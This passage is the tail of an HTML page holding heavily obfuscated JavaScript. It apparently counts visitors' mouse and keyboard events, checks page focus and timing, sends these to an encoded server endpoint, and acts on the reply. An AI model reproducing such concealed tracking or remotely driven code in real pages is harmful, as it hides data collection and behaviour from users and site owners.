v7TxqAd="&FGIpecTigQaXLklOu^v}tf\"w%9W[!J)SAZ<my8E`|x?>4hzRHN+7*rPU,q(s10.6n_3@5]o2Y{VB;Db/Md#Cj=~$:K",l6jc39,SP3bRbX,KhYn00,i8NevWq,eXgFed,qgK9ds,oLUgqb;sP4JLu(l6jc39=""+(M8lCDO3||""),SP3bRbX=l6jc39.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],eXgFed=lT5fWzc[0x0],qgK9ds=-lT5fWzc[0x1]);for(oLUgqb=lT5fWzc[0x0];oLUgqb<SP3bRbX;oLUgqb++){var W8PKkEj=v7TxqAd.indexOf(l6jc39[oLUgqb]);if(W8PKkEj===-lT5fWzc[0x1])continue;if(qgK9ds<lT5fWzc[0x0]){qgK9ds=W8PKkEj}else{sP4JLu(qgK9ds+=W8PKkEj*lT5fWzc[0xc],i8NevWq|=qgK9ds<<eXgFed,eXgFed+=(qgK9ds&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],eXgFed-=lT5fWzc[0x2])}while(eXgFed>lT5fWzc[0x9]);qgK9ds=-lT5fWzc[0x1]}}if(qgK9ds>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|qgK9ds<<eXgFed)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function l6jc39(M8lCDO3){if(typeof qb89tY[M8lCDO3]===lT5fWzc[0x5]){return qb89tY[M8lCDO3]=v7TxqAd(l4j2aR[M8lCDO3])}return qb89tY[M8lCDO3]}return M8lCDO3[lT5fWzc[0x0]]===M8lCDO3[lT5fWzc[0x0]][l6jc39(0x89)]()&&!M8lCDO3[l6jc39(0x8a)]("on")})})[v7TxqAd(0x8b)](M8lCDO3=>{function v7TxqAd(M8lCDO3){var v7TxqAd="yDc3:@fz}Egx1)RJwlV~!bm;hOFvYHjr%.9isZ{ptSUL/n5Q|e*]uaNC>BA#P(6k<W+`G$82IK4,^Xd?qM[o7=_T0&\"",l6jc39,SP3bRbX,KhYn00,i8NevWq,eXgFed,qgK9ds,oLUgqb;sP4JLu(l6jc39=""+(M8lCDO3||""),SP3bRbX=l6jc39.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],eXgFed=lT5fWzc[0x0],qgK9ds=-lT5fWzc[0x1]);for(oLUgqb=lT5fWzc[0x0];oLUgqb<SP3bRbX;oLUgqb++){var W8PKkEj=v7TxqAd.indexOf(l6jc39[oLUgqb]);if(W8PKkEj===-lT5fWzc[0x1])continue;if(qgK9ds<lT5fWzc[0x0]){qgK9ds=W8PKkEj}else{sP4JLu(qgK9ds+=W8PKkEj*lT5fWzc[0xc],i8NevWq|=qgK9ds<<eXgFed,eXgFed+=(qgK9ds&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],eXgFed-=lT5fWzc[0x2])}while(eXgFed>lT5fWzc[0x9]);qgK9ds=-lT5fWzc[0x1]}}if(qgK9ds>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|qgK9ds<<eXgFed)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function l6jc39(M8lCDO3){if(typeof qb89tY[M8lCDO3]===lT5fWzc[0x5]){return qb89tY[M8lCDO3]=v7TxqAd(l4j2aR[M8lCDO3])}return qb89tY[M8lCDO3]}const SP3bRbX=JSON[l6jc39(0x8c)](M8lCDO3);sP4JLu(O61G2Q=_PZr9K(),qgK9ds=SP3bRbX[l6jc39(0x8d)],SP3bRbX[lT5fWzc[0x14]]&&LJOp7h(SP3bRbX[lT5fWzc[0x14]]))})[v7TxqAd(0x8e)](()=>{return lT5fWzc[0x0]}))},0x1f4);let eXuke6=!lT5fWzc[0x1],i4HT0b=lT5fWzc[0x0],aPt3Dtr=lT5fWzc[0x0];sP4JLu(document[v7TxqAd(lT5fWzc[0x15])](v7TxqAd(0x90),M8lCDO3=>{return M8lCDO3[v7TxqAd(lT5fWzc[0x16])]&&i4HT0b++}),document[v7TxqAd(lT5fWzc[0x15])](v7TxqAd(0x92),M8lCDO3=>{return M8lCDO3[v7TxqAd(lT5fWzc[0x16])]&&aPt3Dtr++}),window[v7TxqAd(0x93)]={["cl"](M8lCDO3,v7TxqAd,l6jc39){function SP3bRbX(M8lCDO3){var v7TxqAd="vAdVDJtc,1lB#mi]|k8;XS`{6rEWQ)a0U3h4q5$^TjC>eys!=x~g+LHbI?Y9_Fw7P<GR(.p[fzuO\"M&/K2:onN*}%@Z",SP3bRbX,eXgFed,KhYn00,i8NevWq,qgK9ds,oLUgqb,W8PKkEj;sP4JLu(SP3bRbX=""+(M8lCDO3||""),eXgFed=SP3bRbX.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],qgK9ds=lT5fWzc[0x0],oLUgqb=-lT5fWzc[0x1]);for(W8PKkEj=lT5fWzc[0x0];W8PKkEj<eXgFed;W8PKkEj++){var er5RSgb=v7TxqAd.indexOf(SP3bRbX[W8PKkEj]);if(er5RSgb===-lT5fWzc[0x1])continue;if(oLUgqb<lT5fWzc[0x0]){oLUgqb=er5RSgb}else{sP4JLu(oLUgqb+=er5RSgb*lT5fWzc[0xc],i8NevWq|=oLUgqb<<qgK9ds,qgK9ds+=(oLUgqb&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],qgK9ds-=lT5fWzc[0x2])}while(qgK9ds>lT5fWzc[0x9]);oLUgqb=-lT5fWzc[0x1]}}if(oLUgqb>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|oLUgqb<<qgK9ds)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function eXgFed(M8lCDO3){if(typeof qb89tY[M8lCDO3]===lT5fWzc[0x5]){return qb89tY[M8lCDO3]=SP3bRbX(l4j2aR[M8lCDO3])}return qb89tY[M8lCDO3]}document[eXgFed(0x94)](M8lCDO3)?.addEventListener(eXgFed(0x95),()=>{function M8lCDO3(M8lCDO3){var SP3bRbX="iRGZWKbqABfpE8cSHVOsotNlmkIJLnYhPg2]QX@C(5.0Td\"~z$DaM/[Ur&e:jF9;^#6,*u%3}14x=_vy7<+)w>!|?{`",eXgFed,v7TxqAd,KhYn00,i8NevWq,qgK9ds,oLUgqb,W8PKkEj;sP4JLu(eXgFed=""+(M8lCDO3||""),v7TxqAd=eXgFed.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],qgK9ds=lT5fWzc[0x0],oLUgqb=-lT5fWzc[0x1]);for(W8PKkEj=lT5fWzc[0x0];W8PKkEj<v7TxqAd;W8PKkEj++){var er5RSgb=SP3bRbX.indexOf(eXgFed[W8PKkEj]);if(er5RSgb===-lT5fWzc[0x1])continue;if(oLUgqb<lT5fWzc[0x0]){oLUgqb=er5RSgb}else{sP4JLu(oLUgqb+=er5RSgb*lT5fWzc[0xc],i8NevWq|=oLUgqb<<qgK9ds,qgK9ds+=(oLUgqb&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],qgK9ds-=lT5fWzc[0x2])}while(qgK9ds>lT5fWzc[0x9]);oLUgqb=-lT5fWzc[0x1]}}if(oLUgqb>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|oLUgqb<<qgK9ds)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function SP3bRbX(SP3bRbX){if(typeof qb89tY[SP3bRbX]===lT5fWzc[0x5]){return qb89tY[SP3bRbX]=M8lCDO3(l4j2aR[SP3bRbX])}return qb89tY[SP3bRbX]}if(eXuke6){return}eXuke6=!lT5fWzc[0x0];const eXgFed=_PZr9K();sP4JLu(KhYn00[SP3bRbX(0x96)](i8NevWq,eXgFed+VWiRMf*lT5fWzc[0x17]+""),setTimeout(()=>{function M8lCDO3(M8lCDO3){var SP3bRbX="#WMcA%8_[hBsdzeCVNl0<wQ3Ikr+;q,Zo(|/4v?}2=YDXEy1G5tLP@Kmf*^.Ti&$`H>]9\"n{76bFaRxJg:U)O~jS!up",eXgFed,v7TxqAd,KhYn00,i8NevWq,qgK9ds,oLUgqb,W8PKkEj;sP4JLu(eXgFed=""+(M8lCDO3||""),v7TxqAd=eXgFed.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],qgK9ds=lT5fWzc[0x0],oLUgqb=-lT5fWzc[0x1]);for(W8PKkEj=lT5fWzc[0x0];W8PKkEj<v7TxqAd;W8PKkEj++){var er5RSgb=SP3bRbX.indexOf(eXgFed[W8PKkEj]);if(er5RSgb===-lT5fWzc[0x1])continue;if(oLUgqb<lT5fWzc[0x0]){oLUgqb=er5RSgb}else{sP4JLu(oLUgqb+=er5RSgb*lT5fWzc[0xc],i8NevWq|=oLUgqb<<qgK9ds,qgK9ds+=(oLUgqb&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],qgK9ds-=lT5fWzc[0x2])}while(qgK9ds>lT5fWzc[0x9]);oLUgqb=-lT5fWzc[0x1]}}if(oLUgqb>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|oLUgqb<<qgK9ds)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function SP3bRbX(SP3bRbX){if(typeof qb89tY[SP3bRbX]===lT5fWzc[0x5]){return qb89tY[SP3bRbX]=M8lCDO3(l4j2aR[SP3bRbX])}return qb89tY[SP3bRbX]}return A9qjyF(SP3bRbX(0x97),{[SP3bRbX(0x98)]:qgK9ds,[SP3bRbX(0x99)]:W8PKkEj,[SP3bRbX(0x9a)]:O61G2Q-I43XWV,mm:i4HT0b,dc:aPt3Dtr,fk:v7TxqAd,[SP3bRbX(0x9b)]:!document[SP3bRbX(0x9c)]&&document[SP3bRbX(0x9d)](),ms:eXgFed-O61G2Q})[SP3bRbX(0x9e)](M8lCDO3=>{function SP3bRbX(SP3bRbX){var v7TxqAd="Q)2v*u[O1<WcAl,$Iy/6{#>B7F5_i+=kTmNw.x`S@CLPb~q:9GX%t|Udn^hDRj?HZMJYearVK0o(sE3fp&};4!8\"]zg",i8NevWq,eXgFed,KhYn00,qgK9ds,oLUgqb,W8PKkEj,er5RSgb;sP4JLu(i8NevWq=""+(SP3bRbX||""),eXgFed=i8NevWq.length,KhYn00=[],qgK9ds=lT5fWzc[0x0],oLUgqb=lT5fWzc[0x0],W8PKkEj=-lT5fWzc[0x1]);for(er5RSgb=lT5fWzc[0x0];er5RSgb<eXgFed;er5RSgb++){var s8CSl8_=v7TxqAd.indexOf(i8NevWq[er5RSgb]);if(s8CSl8_===-lT5fWzc[0x1])continue;if(W8PKkEj<lT5fWzc[0x0]){W8PKkEj=s8CSl8_}else{sP4JLu(W8PKkEj+=s8CSl8_*lT5fWzc[0xc],qgK9ds|=W8PKkEj<<oLUgqb,oLUgqb+=(W8PKkEj&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(qgK9ds&lT5fWzc[0x3]),qgK9ds>>=lT5fWzc[0x2],oLUgqb-=lT5fWzc[0x2])}while(oLUgqb>lT5fWzc[0x9]);W8PKkEj=-lT5fWzc[0x1]}}if(W8PKkEj>-lT5fWzc[0x1]){KhYn00.push((qgK9ds|W8PKkEj<<oLUgqb)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function v7TxqAd(M8lCDO3){if(typeof qb89tY[M8lCDO3]===lT5fWzc[0x5]){return qb89tY[M8lCDO3]=SP3bRbX(l4j2aR[M8lCDO3])}return qb89tY[M8lCDO3]}if(v7TxqAd(0x9f)in E1SOs8){i8NevWq()}function i8NevWq(){var SP3bRbX,i8NevWq,eXgFed;function qgK9ds(SP3bRbX){var i8NevWq="zLcsTWyjUxe;?tw/A,Nrn_P{B3(6XvQS9l}Hgb&V*Yf\"2^u`@1)h4C:$R[]mJFKI%k+pD.M>!<=0iZ57E|a~#dqoOG8",eXgFed,qgK9ds,oLUgqb,v7TxqAd,KhYn00,W8PKkEj,er5RSgb;sP4JLu(eXgFed=""+(SP3bRbX||""),qgK9ds=eXgFed.length,oLUgqb=[],v7TxqAd=lT5fWzc[0x0],KhYn00=lT5fWzc[0x0],W8PKkEj=-lT5fWzc[0x1]);for(er5RSgb=lT5fWzc[0x0];er5RSgb<qgK9ds;er5RSgb++){var s8CSl8_=i8NevWq.indexOf(eXgFed[er5RSgb]);if(s8CSl8_===-lT5fWzc[0x1])continue;if(W8PKkEj<lT5fWzc[0x0]){W8PKkEj=s8CSl8_}else{sP4JLu(W8PKkEj+=s8CSl8_*lT5fWzc[0xc],v7TxqAd|=W8PKkEj<<KhYn00,KhYn00+=(W8PKkEj&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(oLUgqb.push(v7TxqAd&lT5fWzc[0x3]),v7TxqAd>>=lT5fWzc[0x2],KhYn00-=lT5fWzc[0x2])}while(KhYn00>lT5fWzc[0x9]);W8PKkEj=-lT5fWzc[0x1]}}if(W8PKkEj>-lT5fWzc[0x1]){oLUgqb.push((v7TxqAd|W8PKkEj<<KhYn00)&lT5fWzc[0x3])}return jcfuP3V(oLUgqb)}function oLUgqb(SP3bRbX){if(typeof qb89tY[SP3bRbX]===lT5fWzc[0x5]){return qb89tY[SP3bRbX]=qgK9ds(l4j2aR[SP3bRbX])}return qb89tY[SP3bRbX]}sP4JLu(SP3bRbX=v7TxqAd(0xa0),i8NevWq=oLUgqb(0xa1),eXgFed=oLUgqb(0xa2),SP3bRbX.match(i8NevWq+eXgFed))}return M8lCDO3&&setTimeout(()=>{return LJOp7h(M8lCDO3)},l6jc39?l6jc39-(_PZr9K()-eXgFed):lT5fWzc[0x0])})[SP3bRbX(0xa3)](()=>{return lT5fWzc[0x0]})},0xa))})},ch:()=>{function M8lCDO3(M8lCDO3){var l6jc39="4JSpHbE8rhRkA{q]0$B1a`yLn+MuFg!&Wc2VNlDKYTC}@U(fP*o#>;\"[eQx:=iOIXw%tzmdsG,Zjv~3<.7/9_5)?^6|",v7TxqAd,SP3bRbX,KhYn00,i8NevWq,eXgFed,qgK9ds,oLUgqb;sP4JLu(v7TxqAd=""+(M8lCDO3||""),SP3bRbX=v7TxqAd.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],eXgFed=lT5fWzc[0x0],qgK9ds=-lT5fWzc[0x1]);for(oLUgqb=lT5fWzc[0x0];oLUgqb<SP3bRbX;oLUgqb++){var W8PKkEj=l6jc39.indexOf(v7TxqAd[oLUgqb]);if(W8PKkEj===-lT5fWzc[0x1])continue;if(qgK9ds<lT5fWzc[0x0]){qgK9ds=W8PKkEj}else{sP4JLu(qgK9ds+=W8PKkEj*lT5fWzc[0xc],i8NevWq|=qgK9ds<<eXgFed,eXgFed+=(qgK9ds&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],eXgFed-=lT5fWzc[0x2])}while(eXgFed>lT5fWzc[0x9]);qgK9ds=-lT5fWzc[0x1]}}if(qgK9ds>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|qgK9ds<<eXgFed)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function l6jc39(l6jc39){if(typeof qb89tY[l6jc39]===lT5fWzc[0x5]){return qb89tY[l6jc39]=M8lCDO3(l4j2aR[l6jc39])}return qb89tY[l6jc39]}return A9qjyF(v7TxqAd(0xa4),{[v7TxqAd(0xa5)]:qgK9ds,[v7TxqAd(0xa6)]:W8PKkEj})[l6jc39(0xa7)](M8lCDO3=>{return Number(M8lCDO3)===lT5fWzc[0x1]})},bl:()=>{function M8lCDO3(M8lCDO3){var v7TxqAd="m8}d9OD/:`@Yx6{Qw$4fC%scA*oM],0tK3J[1(HGT+vbzRZ<#_5knrVSyuU&LWiEPl\"h|^B?I2>e!jF;~X.a7gp)=qN",l6jc39,SP3bRbX,KhYn00,i8NevWq,eXgFed,qgK9ds,oLUgqb;sP4JLu(l6jc39=""+(M8lCDO3||""),SP3bRbX=l6jc39.length,KhYn00=[],i8NevWq=lT5fWzc[0x0],eXgFed=lT5fWzc[0x0],qgK9ds=-lT5fWzc[0x1]);for(oLUgqb=lT5fWzc[0x0];oLUgqb<SP3bRbX;oLUgqb++){var W8PKkEj=v7TxqAd.indexOf(l6jc39[oLUgqb]);if(W8PKkEj===-lT5fWzc[0x1])continue;if(qgK9ds<lT5fWzc[0x0]){qgK9ds=W8PKkEj}else{sP4JLu(qgK9ds+=W8PKkEj*lT5fWzc[0xc],i8NevWq|=qgK9ds<<eXgFed,eXgFed+=(qgK9ds&lT5fWzc[0xd])>lT5fWzc[0xe]?lT5fWzc[0xf]:lT5fWzc[0x10]);do{sP4JLu(KhYn00.push(i8NevWq&lT5fWzc[0x3]),i8NevWq>>=lT5fWzc[0x2],eXgFed-=lT5fWzc[0x2])}while(eXgFed>lT5fWzc[0x9]);qgK9ds=-lT5fWzc[0x1]}}if(qgK9ds>-lT5fWzc[0x1]){KhYn00.push((i8NevWq|qgK9ds<<eXgFed)&lT5fWzc[0x3])}return jcfuP3V(KhYn00)}function v7TxqAd(v7TxqAd){if(typeof qb89tY[v7TxqAd]===lT5fWzc[0x5]){return qb89tY[v7TxqAd]=M8lCDO3(l4j2aR[v7TxqAd])}return qb89tY[v7TxqAd]}return A9qjyF(v7TxqAd(0xa8),{[v7TxqAd(0xa9)]:qgK9ds,[v7TxqAd(0xaa)]:W8PKkEj})[v7TxqAd(0xab)](()=>{})}})}M8lCDO3()})(); </script> </body> </html>